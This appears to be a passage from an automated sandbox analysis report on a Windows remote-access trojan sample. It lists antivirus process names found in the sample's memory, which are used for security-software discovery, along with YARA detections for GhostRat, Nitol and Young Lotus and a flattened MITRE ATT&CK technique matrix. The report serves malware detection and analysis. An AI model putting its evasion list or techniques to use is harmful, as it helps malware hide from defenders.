                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: cpf.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: avp.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: F-PROT.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: spidernt.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: F-PROT.EXE
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: rtvscan.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: nspupsvc.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 360tray.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ashDisp.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: TMBMSRV.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SBAMSvc.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: a2guard.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: avgwdsvc.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: AYAgent.aye
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vsmon.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QUHLPSVC.EXE
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RavMonD.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MsMpEng.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Mcshield.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: K7TSecurity.exe

                Stealing of Sensitive Information

                barindex
                Yara detected GhostRat
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Yara detected Nitol
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Yara detected Young Lotus
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected GhostRat
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Yara detected Nitol
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Yara detected Young Lotus
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		131
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		22
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomains1
                Replication Through Removable Media                		12
                Service Execution                		1
                Valid Accounts                		1
                Valid Accounts                		3
                Obfuscated Files or Information                		LSASS Memory11
                Peripheral Device Discovery                		Remote Desktop Protocol131
                Input Capture                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt23
                Windows Service                		11
                Access Token Manipulation                		12
                Software Packing                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder                		23
                Windows Service                		1
                DLL Side-Loading                		NTDS216
                System Information Discovery                		Distributed Component Object ModelInput Capture1
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
                Process Injection                		1
                Masquerading                		LSA Secrets1
                Query Registry                		SSHKeylogging111
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		1
                Valid Accounts                		Cached Domain Credentials341
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                Virtualization/Sandbox Evasion                		DCSync13
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Access Token Manipulation                		Proc Filesystem13
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt3
                Process Injection                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
